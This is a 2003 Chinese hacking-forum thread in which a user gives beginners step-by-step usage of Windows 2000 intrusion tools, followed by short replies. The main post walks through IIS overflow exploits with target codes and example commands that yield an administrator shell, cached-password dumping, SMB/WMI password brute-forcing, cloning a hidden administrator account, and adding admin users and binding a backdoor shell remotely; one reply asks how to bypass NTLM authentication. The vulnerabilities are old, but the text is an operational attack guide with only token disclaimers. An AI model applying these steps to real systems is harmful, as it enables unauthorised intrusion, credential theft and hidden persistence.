|
作者: fjs [fjs] 论坛用户 | 登录 |
写这篇文章的目的不是告诉大家怎么去破坏别人机子,只是告诉一些黑客初学者怎么使用这些工具。使用工具不是目的,对国内的网络安全没有多大益处,也不容易提高自身的水平;要提高自身水平,多学些编程技术,掌握一些技术性的原理,以及更深层次的东西。 请勿用于破坏国内主机,否则后果自负。 以下工具都是在windows2000下测试的,大部分工具也都是针对Win2K 以下所提到的工具在国内一些黑客网上都会找到,或者到百度、google里搜索。 1,IDAHack.exe:此工具是Windows2000 iis ida溢出攻击程序,在windows200+SP2以前的版本有此漏洞,用法如下: idahack <Host> <HostPort> <HostType> <ShellPort> IP 服务端口 补丁类型 溢出端口 以下是各版本补丁的代号 chinese win2k : 1 chinese win2k, sp1: 2 chinese win2k, sp2: 3 english win2k : 4 english win2k, sp1: 5 english win2k, sp2: 6 japanese win2k : 7 japanese win2k, sp1: 8 japanese win2k, sp2: 9 korea win2k : 10 korea win2k, sp1: 11 korea win2k, sp2: 12 chinese NT, sp5: 13 chinese NT, sp6: 14 例如:idahack 10.1.1.2 80 3 99 成功后会出现如下情况: connceting... sending... checking... Now you can telnet to 99 port good luck :) ----------------- 出现了good luck :)后,就说明溢出成功,此时你就可以telnet 10.1.1.2 99 到对方的机子上了,得到的是管理员权限,马上给建个用户,然后加到管理员组,OK,其他你想做什么不用我多说了吧 2,FindPass.exe:该工具主要用于查机器缓存里管理员密码的命令行工具 用法:直接输入findpass既可, 结果会出现: ...省略.... The logon information is: FJS/administrator/123456 ...省略... 其中::FJS"为该机机名;"administrator"是该机当前用户;"123456"当然就是密码了 当然,如果你想查看远程机子缓存里的密码,得先把该工具上传到远程机子,至于用处很多人都以为这东西没什么大用,我个人认为可以用来查看远程机子里缓存里的密码,以后不不用再建个什么后门呀隐藏用户加到管理组什么的,而且远程主机的密码可能牵连到其他系统密码. 3,SMBCrack.exe:该工具用于高速破解远程服务器的口令程序。 用法如下:SMBCrack <IP> <Username> <Password file> [port] 远程机用户名 字典 端口(默认端口为80) (字典先要自己编辑好) 如何得到远程机用户名用扫描工具扫描就知道了,密码文件最好放在当前目录下,不然要加文件路径,端口一般写80 例如:SMBCrack 10.1.1.2 fjs passwd.txt 80 成功后,密码会显示到命令行下方 4:WMICracker.exe: 该工具也用于高速的破解远程服务器的口令不过占用CPU资源很高,所以个人认为没SMBCrack.exe好用。 用法如下:WMICracker <IP> <Username> <Password File> [port] (默认端口为80) 用法和SMBCrack.exe一样,就不用我多说了吧,真不知道再来问我好了。 5:pulist.exe 该工具是在命令行下查看服务器进程的工具 用法直接输入:pulist.exe就可以看到了,功能和win2K下的windows任务管理器一样。主要一个功能是还可以查看远程机子的进程, 用法:pulist IP 就可以看到远程机子的进程了,很不错吧! 6,iis5hack.exe 该工具是Windows 2000 .printf 溢出攻击程序!!(只对windows2000+SP1以前的版本有效) 使用方法如下: iis5hack <Host> <HostPort> <HostType> <ShellPort> IP 服务端口 补丁类型 溢出端口 各版本代号: chinese edition: 0 chinese edition, sp1: 1 english edition: 2 english edition, sp1: 3 japanese edition: 4 japanese edition, sp1: 5 korea edition: 6 korea edition, sp1: 7 mexico edition: 8 mexico edition, sp1: 9 例如:iis5hack 10.1.1.2 80 1 99 成功后将会得到管理员权限,由于最近在家里找不着SP1以前的机子,所以不能给出成功后的情况,请大家自己判断吧,不过近来随着SP4的推出,SP1以前的版本真是很少了,不好找。 7,ca.exe 很有名的一个工具(还有个名字好像叫sa.exe),该工具用于克隆帐号。利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号(此普通帐号必须已经存在,至于如何得到远程机上都有什么用户,用扫描器吧)。克隆得到的帐号具有和系统内置的Administrator同样的设置,并且用NET命令或者用户管理器也发现不了其权限已经被提升 事先必需得到对方的管理员权限,主要用于入侵后克隆一个普通帐号....... 用法如下,事先我们得到了管理员用户为fjs密码为123456 ,现在我们把普通帐号TsInternetUser克隆成管理员 C:\>ca \\10.1.1.2 fjs 123456 TsInternetUser password 当出现如下情况时,说明克隆成功 ......省略......... Connect 10.1.1.12 ....OK Get SID of TsInternetUser ....OK Prepairing ....OK Processing ....OK Clean Up ....OK 呵呵,好了,现在你有一个看起来是普通帐号的管理员了,如果不用专门的工具查看,被被克隆的帐号是很难发现的,记得不要做坏事哦!! 8,caa.exe 用于检查机子里是否有被克隆的帐号 用法如下:cca \\IP 管员帐户 密码 例如:cca \\10.1.1.2 fjs 123456 如果有克隆帐号的话,将会显示出来哪些是克隆帐号 9,ap.exe erlIS.dll的溢出攻击工具,可在7788得到shell。 使用方法:ap.exe <hosename> [sp] SP代号 例如:ap.exe 10.1.1.2 2 成功后会出现如下情况: C:\1\cmd>ap.exe 10.1.1.2 2 Connected... send shellcode... all done! you can telnet 10.1.1.2 2 7788 此时你可以telnet 10.1.1.2 7788 得到的是管理员权限,telnet上后你想做什么都行,记得,不要做坏事呀,否则后果自负!! 10,hackkit.exe 该工具据说功能强大,用于得到管理员密码后的入侵。 用法如下:hackkit [host] [参数] 主要参数有: -start SRVNAME -stop SRVNAME -remove SRVNAME -adduser [user] [passwd] -deluser [user] -opendoor [port] -closedoor 各参数说明: -info 取得远程主机服务信息 -start 启动远程主机服务 -stop 停止远程主机服务 -adduser 在远程主机上添加username/passwd的用户,administrator权限 -deluser 在远程主机上删除username用户 -opendoor 在远程主机的端口上绑定一个shell,然后telnet xxx.xxx.xxx.xxx -closedoor 登出远程主机后别忘了关闭刚才开的“门“。:} 真可谓是功能强大,不过本人只用过一些,现介绍如下: 例1:hackkit 10.1.1.2 -info 此功能显示远程主机的服务,会显示出每个服务的状态以及总共多少服务,已启动了多少,未启动的多少。 例2:hackkit 10.1.1.2 -start w32time (服务名) 当出现:[w32time] on \\FJS started successful!时,说明启动成功,这时,你用hackkit 10.1.1.2 -info看看是不是该服务已启动成功 同理,停止服务的命令也类似:hackkit 10.1.1.2 -stop w32time (服务名) 当出现:[w32time] on \\FJS stopped successful!时,说明停止成功,这时,你用hackkit 10.1.1.2 -info看看是不是该服务已停止了 例3:添加用户 hackkit 10.1.1.2 -adduser fjs 123456 成功后出现如下情况:Add a user <fjs> on [FJS] successfully! 此时说明,你已成功给远程主机添加了一个用户名为fjs密码为123456的管理员组的用户了。 后面几个功能用法也基本差不多,自己看吧,不明白再来问我, 晕了,一个晚上才写这么点东东,还有一些工具过两天再整理吧,如果本篇文章对您有帮助的话,或者哪些地方有错误的话,请您告诉我,我会继续努力的。 作者:FJS E-mail:fjsabc@163.com QQ:23762216 2003年8月27日 |
地主 发表时间: 08/28 21:11 |
回复: cncd [cncd] 论坛用户 | 登录 |
谢谢. |
B1层 发表时间: 08/28 21:21 |
回复: bfn693 [bfn693] 论坛用户 | 登录 |
顶一个吧~~~ |
B2层 发表时间: 08/28 22:11 |
回复: fjs [fjs] 论坛用户 | 登录 |
没人看,不写了 |
B3层 发表时间: 08/30 19:53 |
回复: ganjiawei [ganjiawei] 论坛用户 | 登录 |
看啊 要是告诉能下这工具的地址更好(要安全一点喽) |
B4层 发表时间: 08/30 21:16 |
回复: Alian [miku] 论坛用户 | 登录 |
这些是基本的,怎么会没有人看了 难道20CN里就没有菜鸟了吗? 不可能! |
B5层 发表时间: 08/30 21:33 |
回复: cwenqiang [cwenqiang] 论坛用户 | 登录 |
我是菜鸟~ |
B6层 发表时间: 08/30 22:55 |
回复: lyc_0135 [lyc_0135] 论坛用户 | 登录 |
我也是菜鸟 |
B7层 发表时间: 08/31 06:31 |
回复: jamesgj [jamesgj] 论坛用户 | 登录 |
俺也是菜鸟!呵呵!:) |
B8层 发表时间: 09/03 14:06 |
回复: lucky_ya [lucky_ya] 论坛用户 | 登录 |
新来的菜鸟. |
B9层 发表时间: 09/03 16:51 |
回复: icepoint [icepoint] 论坛用户 | 登录 |
其实我也只是略懂皮毛,还是要谢谢这位大侠.我有个问题,就是如何可以绕过NTML的验证.我试过很多方法了,有一个可行但是对自己不安全.请问有没有安全或者更好的方法呢? |
B10层 发表时间: 09/03 18:02 |
回复: bcliangzi [bcliangzi] 论坛用户 | 登录 |
菜鸟都就多发一些呀!共同分享嘛! |
B11层 发表时间: 09/03 18:56 |
回复: shadow [yyfzlh] 论坛用户 | 登录 |
谢谢,对我了解编程有一定帮助,go on ~~~~~ |
B12层 发表时间: 09/04 00:41 |
回复: rainy [rainy] 论坛用户 | 登录 |
我也是菜鸟!1!!!!!! |
B13层 发表时间: 09/04 21:43 |
回复: fjs [fjs] 论坛用户 | 登录 |
呵呵,另一篇总算写出来了, |
B14层 发表时间: 09/10 18:42 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号